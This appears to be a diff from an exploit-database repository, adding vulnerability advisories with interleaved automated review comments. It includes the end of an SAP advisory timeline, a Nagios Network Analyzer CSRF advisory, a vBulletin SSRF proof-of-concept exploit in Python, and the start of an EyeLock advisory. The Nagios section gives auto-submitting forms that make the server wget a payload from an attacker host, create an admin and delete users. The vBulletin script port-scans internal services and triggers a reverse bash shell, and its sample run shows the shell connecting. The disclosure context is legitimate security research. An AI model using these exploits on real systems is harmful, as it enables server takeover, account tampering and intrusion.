2016-04-22: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according with the release of a solution to the issues.
|
||||
2016-04-25: SAP confirmed the reported vulnerabilities and assigned the following security incident tickets IDs: 1670264798, 1670264799 and 1670264800.
|
||||
2016-05-10: Core Security asked SAP if they had a tentative date for publishing the security fixes.
|
||||
2016-05-20: SAP informed Core Security they have a tentative release date on July 12th, 2016 (July Patch day).
|
||||
2016-05-23: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation.
|
||||
2016-06-27: Core Security requested SAP the tentative security notes numbers and links in order to add them to our security advisory.
|
||||
2016-07-05: SAP informed Core Security they due to some issues found during their testing phase of the patches they were not in a position to ship the patches as part of their July patch day. They said they would be able to ship the patches with August patch day.
|
||||
2016-07-06: Core Security requested SAP the specific day in August they planed to release the patches.
|
||||
2016-07-20: Core Security requested again SAP the specific day in August they planed to release the patches.
|
||||
2016-07-21: SAP informed Core Security they would publish their security notes on the 9th of August.
|
||||
2016-08-10: Advisory CORE-2016-0006 published.
|
||||
9. References
|
||||
|
||||
[1] http://go.sap.com/.
|
||||
|
||||
10. About CoreLabs
|
||||
|
||||
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
|
||||
|
||||
11. About Core Security
|
||||
|
||||
Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company’s strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security’s analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.
|
||||
|
||||
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.
|
||||
|
||||
12. Disclaimer
|
||||
|
||||
The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
||||
|
||||
13. PGP/GPG Keys
|
||||
|
||||
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
|
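Review bot: the dates disagree within the hunk: section 1 says "Date published: 2016-08-09" while the timeline's last entry reads "2016-08-10: Advisory CORE-2016-0006 published." (files.csv records 2016-08-10); one of the two should be corrected. For 7.2 the strace excerpt is the clearest evidence of the CWE-367 window (open, write, close, utime, then a path-based chmod), and the advisory could state what closes it: applying the archived mode with fchmod on the still-open descriptor rather than chmod on the path after close, since a path lookup after close is exactly what a hard link swapped in by a local user redirects. Section 7 also repeats the section 3 paragraph verbatim, and 7.1 should spell out that "not checking the return value" refers to the failed open of the path containing the embedded byte shown as "inp#t", which is what the "No such file or director" line and the subsequent segmentation fault demonstrate.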
149
platforms/php/webapps/40221.txt
Executable file
|
@ -0,0 +1,149 @@
|
|||
[+] Credits: John Page ( hyp3rlinx )
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
www.nagios.com
|
||||
|
||||
|
||||
Product:
|
||||
==============================
|
||||
Nagios Network Analyzer v2.2.1
|
||||
|
||||
Netflow Analysis, Monitoring, and Bandwidth Utilization Software
|
||||
|
||||
Network Analyzer provides an in-depth look at all network traffic sources
|
||||
and potential security threats allowing system
|
||||
admins to quickly gather high-level information regarding the health of the
|
||||
network as well as highly granular data for
|
||||
complete and thorough network analysis.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=================================
|
||||
Cross Site Request Forgery (CSRF)
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be
|
||||
transmitted from a user that the website trusts if that user is
|
||||
authenticated and visits a malicious webpage or clicks a attacker supplied
|
||||
link. The Nagios system can be compromised as remote attackers
|
||||
can create arbitrary commands e.g. using "wget" to download RCE files onto
|
||||
the system, create arbitrary Admins, delete users, and conduct
|
||||
DOS attacks.
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
================
|
||||
|
||||
1) Create arbitrary commands
|
||||
|
||||
<form action="
|
||||
http://victim-server/nagiosna/index.php/api/system/create_command"
|
||||
method="post">
|
||||
<input type="hidden" name="name" value="pwn">
|
||||
<input type="hidden" name="location" value="%2Fusr%2Fbin%2Fwget">
|
||||
<input type="hidden" name="script" value="wget">
|
||||
<input type="hidden" name="args"
|
||||
value="http%3A%2F%2Fattacker-server%2FRCE.php">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
2) Add Admin
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/admin/users/create"
|
||||
method="post" accept-charset="utf-8">
|
||||
<input type="text" name="first_name" value="CSRF">
|
||||
<input type="text" name="last_name" value="ME">
|
||||
<input type="text" name="company" value="PWN">
|
||||
<input type="text" name="email" value="evil@abyss.com">
|
||||
<input type="text" name="phone" value="">
|
||||
<input type="text" name="username" value="HYP3RLINX">
|
||||
<input type="password" name="password" value="abc123">
|
||||
<input type="password" name="password2" value="abc123">
|
||||
<input type="hidden" name="language" value="default" >
|
||||
<input type="hidden" name="account_type" id="account_type" value="local">
|
||||
<input type="hidden" name="ldap_server" id="ldap_server">
|
||||
<input type="hidden" name="ad_server" id="ad_server" value="1">
|
||||
|
||||
<input type="text" name="ad_username" id="ad_username">
|
||||
<input type="text" name="dn" placeholder="cn=John Smith,dn=nagios,dc=com">
|
||||
<input type="radio" name="group" value="1" checked="true" >
|
||||
<input type="radio" name="apiaccess" value="1" >
|
||||
<input type="radio" name="apiaccess" value="0" checked>
|
||||
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
3) Delete reports (report ID must be known or guessed)
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/api/reports/delete"
|
||||
method="post">
|
||||
<input type="hidden" name="q[rid]" value="9">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
4) DOS
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/api/system/stop"
|
||||
method="post">
|
||||
<input type="hidden" name="sid" value="1">
|
||||
<script>//document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
5) Delete users (user ID must be known or guessed)
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/admin/users/delete"
|
||||
method="post">
|
||||
<input type="hidden" name="id" value="10">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: July 20, 2016
|
||||
Vendor Acknowledgement: July 21, 2016
|
||||
Vendor Fix / Release: August 1, 2016
|
||||
August 8, 2016 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
HYP3RLINX
|
524
platforms/php/webapps/40225.py
Executable file
|
@ -0,0 +1,524 @@
|
|||
'''
|
||||
=============================================
|
||||
- Discovered by: Dawid Golunski
|
||||
- http://legalhackers.com
|
||||
- dawid (at) legalhackers.com
|
||||
|
||||
- CVE-2016-6483
|
||||
- Release date: 05.08.2016
|
||||
- Severity: High
|
||||
=============================================
|
||||
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
|
||||
vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)
|
||||
vBulletin <= 4.2.3
|
||||
vBulletin <= 3.8.9
|
||||
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
|
||||
vBulletin (vB) is a proprietary Internet forum software package developed by
|
||||
vBulletin Solutions, Inc., a division of Internet Brands.
|
||||
|
||||
https://www.vbulletin.com/
|
||||
https://en.wikipedia.org/wiki/VBulletin
|
||||
|
||||
|
||||
A google search for "Powered by vBulletin" returns over 19 million sites
|
||||
that are hosting a vBulletin forum:
|
||||
|
||||
https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22
|
||||
|
||||
|
||||
III. INTRODUCTION
|
||||
-------------------------
|
||||
|
||||
vBulletin forum software is affected by a SSRF vulnerability that allows
|
||||
unauthenticated remote attackers to access internal services (such as mail
|
||||
servers, memcached, couchDB, zabbix etc.) running on the server hosting
|
||||
vBulletin as well as services on other servers on the local network that are
|
||||
accessible from the target.
|
||||
|
||||
This advisory provides a PoC exploit that demonstrates how an unauthenticated
|
||||
attacker could perform a port scan of the internal services as well as execute
|
||||
arbitrary system commands on a target vBulletin host with a locally installed
|
||||
Zabbix Agent monitoring service.
|
||||
|
||||
IV. DESCRIPTION
|
||||
-------------------------
|
||||
|
||||
vBulletin allows forum users to share media fiels by uploading them to the
|
||||
remote server. Some pages allow users to specify a URL to a media file
|
||||
that a user wants to share which will then be retrieved by vBulletin.
|
||||
The user-provided links are validated to make sure that users can only access
|
||||
resources from HTTP/HTTPS protocols and that connections are not allowed in to
|
||||
the localhost.
|
||||
|
||||
These restrictions can be found in core/vb/vurl/curl.php source file:
|
||||
|
||||
/**
|
||||
* Determine if the url is safe to load
|
||||
*
|
||||
* @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host
|
||||
* @return boolean
|
||||
*/
|
||||
private function validateUrl($urlinfo)
|
||||
{
|
||||
// VBV-11823, only allow http/https schemes
|
||||
if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https')))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
// VBV-11823, do not allow localhost and 127.0.0.0/8 range by default
|
||||
if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host']))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
if (empty($urlinfo['port']))
|
||||
{
|
||||
if ($urlinfo['scheme'] == 'https')
|
||||
{
|
||||
$urlinfo['port'] = 443;
|
||||
}
|
||||
else
|
||||
{
|
||||
$urlinfo['port'] = 80;
|
||||
}
|
||||
}
|
||||
// VBV-11823, restrict detination ports to 80 and 443 by default
|
||||
// allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to).
|
||||
$config = vB::getConfig();
|
||||
[...]
|
||||
|
||||
|
||||
HTTP redirects are also prohibited however there is one place in the vBulletin
|
||||
codebase that accepts redirects from the target server specified in a
|
||||
user-provided link.
|
||||
The code is used to upload media files within a logged-in user's profile and
|
||||
can normally be accessed under a path similar to:
|
||||
|
||||
http://forum/vBulletin522/member/1-mike/media
|
||||
|
||||
By specifying a link to a malicious server that returns a 301 HTTP redirect to
|
||||
the URL of http://localhost:3306 for example, an attacker could easily
|
||||
bypass the restrictions presented above and make a connection to mysql/3306
|
||||
service listening on the localhost.
|
||||
|
||||
This introduces a Server Side Request Forgery (SSRF) vulnerability.
|
||||
|
||||
As curl is used to fetch remote resources, in addition to HTTP, attackers could
|
||||
specify a handful of other protocols to interact with local services.
|
||||
For instance, by sending a redirect to gopher://localhost:11211/datahere
|
||||
attackers could send arbitrary traffic to memcached service on 11211 port.
|
||||
|
||||
Additionally, depending on the temporary directory location configured within
|
||||
the forum, attackers could potentially view the service responses as the
|
||||
download function stores responses within temporary files which could be
|
||||
viewed if the temporary directory is exposed on the web server.
|
||||
|
||||
|
||||
V. PROOF OF CONCEPT EXPLOIT
|
||||
-------------------------
|
||||
|
||||
The exploit code below performs a port scan as well as demonstrates remote
|
||||
command execution via a popular Zabbix Agent monitoring service which might be
|
||||
listening on local port of 10050.
|
||||
The exploit will execute a reverse bash shell on the target if it has the agent
|
||||
installed and permits remote commands.
|
||||
|
||||
The exploit was verified on the following zabbix agent configuration
|
||||
(/etc/zabbix/zabbix_agentd.conf):
|
||||
|
||||
Server=127.0.0.1,::1
|
||||
EnableRemoteCommands=1
|
||||
|
||||
|
||||
------------[ vBulletin_SSRF_exploit.py ]-----------
|
||||
'''
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
intro = """
|
||||
vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE)
|
||||
|
||||
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
|
||||
installed on the web server that is hosting the vBulletin forum.
|
||||
|
||||
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
|
||||
gives an option to execute a reverse shell (Remote Commands) that will connect
|
||||
back to the attacker's host on port 8080 by default.
|
||||
|
||||
Coded by:
|
||||
|
||||
Dawid Golunski
|
||||
http://legalhackers.com
|
||||
"""
|
||||
usage = """
|
||||
Usage:
|
||||
The exploit requires that you have an external IP and can start a listener on port 80/443
|
||||
on the attacking machine.
|
||||
|
||||
./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port]
|
||||
|
||||
Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85
|
||||
on the remote vBulletin target host:
|
||||
|
||||
./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85
|
||||
|
||||
Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g:
|
||||
|
||||
nc -vv -l -p 8080
|
||||
|
||||
Disclaimer:
|
||||
For testing purposes only. Do no harm.
|
||||
|
||||
SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target.
|
||||
"""
|
||||
|
||||
import web # http://webpy.org/installation
|
||||
import threading
|
||||
import time
|
||||
import urllib
|
||||
import urllib2
|
||||
import socket
|
||||
import ssl
|
||||
import sys
|
||||
|
||||
|
||||
# The listener that will send redirects to the targe
|
||||
class RedirectServer(threading.Thread):
|
||||
def run (self):
|
||||
urls = ('/([0-9a-z_]+)', 'do_local_redir')
|
||||
app = web.application(urls, globals())
|
||||
#app.run()
|
||||
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port))
|
||||
|
||||
class do_local_redir:
|
||||
def GET(self,whereto):
|
||||
if whereto == "zabbixcmd_redir":
|
||||
# code exec
|
||||
# redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s]
|
||||
return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } )
|
||||
else:
|
||||
# internal port connection
|
||||
return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} )
|
||||
|
||||
def shutdown(code):
|
||||
print "\nJob done. Exiting"
|
||||
if redirector_started == 1:
|
||||
web.httpserver.server.interrupt = KeyboardInterrupt()
|
||||
exit(code)
|
||||
|
||||
|
||||
# [ Default settings ]
|
||||
|
||||
# reverse shell will connect back to port defined below
|
||||
shell_port = 8080
|
||||
# Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it)
|
||||
our_port = 443
|
||||
# How long to wait (seconds) before considering a port to be opened.
|
||||
# Don't set it too high to avoid service timeout and an incorrect close state
|
||||
connect_time = 2
|
||||
# Default port scan range is limited to 20-90 to speed up things when testing,
|
||||
# feel free to increase maxport to 65535 here or on the command line if you've
|
||||
# got the time ;)
|
||||
minport = 20
|
||||
maxport = 90
|
||||
# ignore invalid certs (enable if target forum is HTTPS)
|
||||
#ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
|
||||
|
||||
|
||||
# [ Main Meat ]
|
||||
|
||||
print intro
|
||||
redirector_started = 0
|
||||
|
||||
if len(sys.argv) < 3 :
|
||||
print usage
|
||||
sys.exit(2)
|
||||
|
||||
# Set our HTTP Listener/Redirector's external IP
|
||||
our_ext_ip = sys.argv[1]
|
||||
try:
|
||||
socket.inet_aton(our_ext_ip)
|
||||
except socket.error:
|
||||
print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip
|
||||
exit(2)
|
||||
|
||||
our_server = "http://%s:%s" % (our_ext_ip, our_port)
|
||||
|
||||
# Target forum base URL (e.g. http://vulnerable-vbulletin/forum)
|
||||
targetforum = sys.argv[2]
|
||||
# Append vulnerable media upload script path to the base URL
|
||||
targeturl = targetforum.strip('/') + "/link/getlinkdata"
|
||||
|
||||
# Change port range (if provided)
|
||||
if (len(sys.argv) == 5) :
|
||||
minport = int(sys.argv[3])
|
||||
# Finish scanning at maxport
|
||||
maxport = int(sys.argv[4])
|
||||
|
||||
|
||||
# Confirm data
|
||||
print "\n* Confirm your settings\n"
|
||||
print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport)
|
||||
key = raw_input("Are these settings correct? Hit enter to start the port scan... ")
|
||||
|
||||
# Connection check
|
||||
print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl
|
||||
req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } )
|
||||
try:
|
||||
response = urllib2.urlopen(req, timeout=connect_time).read()
|
||||
except urllib2.URLError as e:
|
||||
print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason
|
||||
shutdown(2)
|
||||
|
||||
# Server should return 'invalid_url' string if not url provided in POST
|
||||
if "invalid_url" not in response:
|
||||
print """Invalid target url (%s) or restricted access.\n
|
||||
\nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl)
|
||||
sys.exit(2)
|
||||
else:
|
||||
print "Got the right response from the URL. The target looks vulnerable!\n"
|
||||
|
||||
# [ Start the listener and perform a port scan ]
|
||||
print "Let's begin!\n"
|
||||
print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port)
|
||||
RedirectServer().start()
|
||||
redirector_started = 1
|
||||
|
||||
print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum)
|
||||
start = time.time()
|
||||
opened_ports = []
|
||||
maxport+=1
|
||||
|
||||
for targetport in range(minport, maxport):
|
||||
#print "\n\nScanning port %d\n" % (targetport)
|
||||
fetchurl = '%s/%d' % (our_server, targetport)
|
||||
data = urllib.urlencode({'url' : fetchurl})
|
||||
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
|
||||
try:
|
||||
response = urllib2.urlopen(req, timeout=connect_time)
|
||||
except urllib2.URLError, e:
|
||||
print "Oops, url issue? 403 , 404 etc.\n"
|
||||
except socket.timeout, ssl.SSLError:
|
||||
print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport)
|
||||
opened_ports.append(targetport)
|
||||
|
||||
elapsed = (time.time() - start)
|
||||
print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum)
|
||||
for listening in opened_ports:
|
||||
print "Port %d : Opened\n" % listening
|
||||
print "\nAnything juicy? :)\n"
|
||||
|
||||
if 10050 in opened_ports:
|
||||
print "* Zabbix Agent was found on port 10050 !\n"
|
||||
|
||||
# [ Command execution via Zabbix Agent to gain a reverse shell ]
|
||||
key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ")
|
||||
if key != 'y' :
|
||||
shutdown(0)
|
||||
|
||||
print "\n* Executing reverse shell via Zabbix Agent (10050)."
|
||||
fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir')
|
||||
data = urllib.urlencode({'url' : fetchurl})
|
||||
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
|
||||
payload_executed = 0
|
||||
try:
|
||||
response = urllib2.urlopen(req, timeout=connect_time)
|
||||
except urllib2.URLError, e:
|
||||
print "Oops, url issue? 403 , 404 etc.\n"
|
||||
except socket.timeout, ssl.SSLError:
|
||||
# Agent connection remained opened for 2 seconds after the bash payload was sent,
|
||||
# it looks like the sleep 2s shell command must have got executed sucessfuly
|
||||
payload_executed = 1
|
||||
|
||||
if (payload_executed == 1) :
|
||||
print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port
|
||||
else:
|
||||
print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n"
|
||||
|
||||
shutdown(0)
|
||||
|
||||
'''
|
||||
----------------------[ eof ]------------------------
|
||||
|
||||
|
||||
Example run:
|
||||
|
||||
root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85
|
||||
|
||||
vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE)
|
||||
|
||||
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
|
||||
installed on the web server that is hosting the vBulletin forum.
|
||||
|
||||
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
|
||||
gives an option to execute a reverse shell (Remote Commands) that will connect
|
||||
back to the attacker's host on port 8080 by default.
|
||||
|
||||
Coded by:
|
||||
|
||||
Dawid Golunski
|
||||
http://legalhackers.com
|
||||
|
||||
|
||||
* Confirm your settings
|
||||
|
||||
Redirect server to listen on: 192.168.57.10:443
|
||||
Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata
|
||||
Scan ports between: 20 - 85
|
||||
|
||||
Are these settings correct? Hit enter to start the port scan...
|
||||
|
||||
* Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata]
|
||||
|
||||
Got the right response from the URL. The target looks vulnerable!
|
||||
|
||||
Let's begin!
|
||||
|
||||
* Starting our redirect base server on 192.168.57.10:443
|
||||
|
||||
* Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target
|
||||
|
||||
http://0.0.0.0:443/
|
||||
192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301
|
||||
192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301
|
||||
192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301
|
||||
Conection opened for 2 seconds. Port 22 is opened!
|
||||
|
||||
192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301
|
||||
192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301
|
||||
192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301
|
||||
Conection opened for 2 seconds. Port 25 is opened!
|
||||
|
||||
192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301
|
||||
[...]
|
||||
192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301
|
||||
192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301
|
||||
Conection opened for 2 seconds. Port 80 is opened!
|
||||
|
||||
192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301
|
||||
192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301
|
||||
192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301
|
||||
192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301
|
||||
192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301
|
||||
|
||||
Scanning done in 14 seconds.
|
||||
|
||||
* Opened ports on the target [http://192.168.57.10/vBulletin522new/]:
|
||||
|
||||
Port 22 : Opened
|
||||
|
||||
Port 25 : Opened
|
||||
|
||||
Port 80 : Opened
|
||||
|
||||
|
||||
Anything juicy? :)
|
||||
|
||||
Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y
|
||||
|
||||
* Executing reverse shell via Zabbix Agent (10050).
|
||||
192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301
|
||||
|
||||
Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :)
|
||||
|
||||
|
||||
Job done. Exiting
|
||||
|
||||
|
||||
Here is how the netcat session looks like after a sucessful exploitation:
|
||||
|
||||
$ nc -vvv -l -p 8080
|
||||
Listening on [0.0.0.0] (family 0, port 8080)
|
||||
Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259)
|
||||
|
||||
zabbix@trusty:/$ id
|
||||
id
|
||||
uid=122(zabbix) gid=129(zabbix) groups=129(zabbix)
|
||||
zabbix@trusty:/$
|
||||
|
||||
|
||||
|
||||
As we can see reverse shell was executed on the target which sucessfully
|
||||
connected back to the attacker's netcat listener.
|
||||
|
||||
VI. BUSINESS IMPACT
|
||||
-------------------------
|
||||
|
||||
The vulnerability can expose internal services running on the server/within
|
||||
the local network.
|
||||
If not patched, unauthenticated attackers or automated scanners searching for
|
||||
vulnerable servers could send malicious data to internal services.
|
||||
Depending on services in use, the impact could range from sensitive information
|
||||
disclosure, sending spam, DoS/data loss to code execution as demonstrated by
|
||||
the PoC exploit in this advisory.
|
||||
|
||||
|
||||
VII. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
|
||||
All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches
|
||||
named in the next section are affected by this vulnerability.
|
||||
|
||||
|
||||
VIII. SOLUTION
|
||||
-------------------------
|
||||
|
||||
Upon this advisory, vendor has published the following security releases of
|
||||
vBulletin for each of the affected branches:
|
||||
|
||||
|
||||
vBulletin 5.2.3
|
||||
|
||||
vBulletin 4.2.4 Beta
|
||||
|
||||
vBulletin 3.8.10 Beta
|
||||
|
||||
|
||||
Separate patches have also been released (see references below).
|
||||
|
||||
IX. REFERENCES
|
||||
-------------------------
|
||||
|
||||
http://legalhackers.com
|
||||
|
||||
http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
|
||||
|
||||
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483
|
||||
|
||||
vBulletin patches:
|
||||
|
||||
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2
|
||||
|
||||
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta
|
||||
|
||||
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta
|
||||
|
||||
X. CREDITS
|
||||
-------------------------
|
||||
|
||||
The vulnerability has been discovered by Dawid Golunski
|
||||
|
||||
dawid (at) legalhackers (dot) com
|
||||
http://legalhackers.com
|
||||
|
||||
XI. REVISION HISTORY
|
||||
-------------------------
|
||||
|
||||
05.08.2016 - final advisory released
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
|
||||
The information contained within this advisory is supplied "as-is" with
|
||||
no warranties or guarantees of fitness of use or otherwise. I accept no
|
||||
responsibility for any damage caused by the use or misuse of this information.
|
||||
'''
|
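Review bot: the port-scan loop's second handler, `except socket.timeout, ssl.SSLError:`, is Python 2's `except Type, name:` form, so it catches only `socket.timeout` and binds the caught exception to the name `ssl.SSLError` (clobbering the module attribute) instead of also catching SSL errors; the same line is repeated in the Zabbix block. It should read `except (socket.timeout, ssl.SSLError):`, and that alone likely explains the "SSL/TLS support needs some tuning" caveat in the usage text. Also worth documenting next to the `zabbixcmd_redir` comment: the `1` after `gopher://localhost:10050/` is the gopher item-type byte that curl strips before sending the selector, which is why `system.run[...]` reaches the agent intact; without that remark the `1` reads like a typo. Finally, the scanner reports a port open whenever the request hangs for `connect_time` seconds, so a port that silently drops the connection will be reported as open too; the comment above `connect_time` should say so rather than only warning against setting it too high.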
55
platforms/php/webapps/40227.txt
Executable file
|
@ -0,0 +1,55 @@
|
|||
EyeLock nano NXT 3.5 Local File Disclosure Vulnerability
|
||||
|
||||
|
||||
Vendor: EyeLock, LLC
|
||||
Product web page: http://www.eyelock.com
|
||||
Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
|
||||
NXT Firmware: 3.04.1108 (ICM: 3.4.13)
|
||||
NXT Firmware: 3.03.944 (ICM: 3.3.2)
|
||||
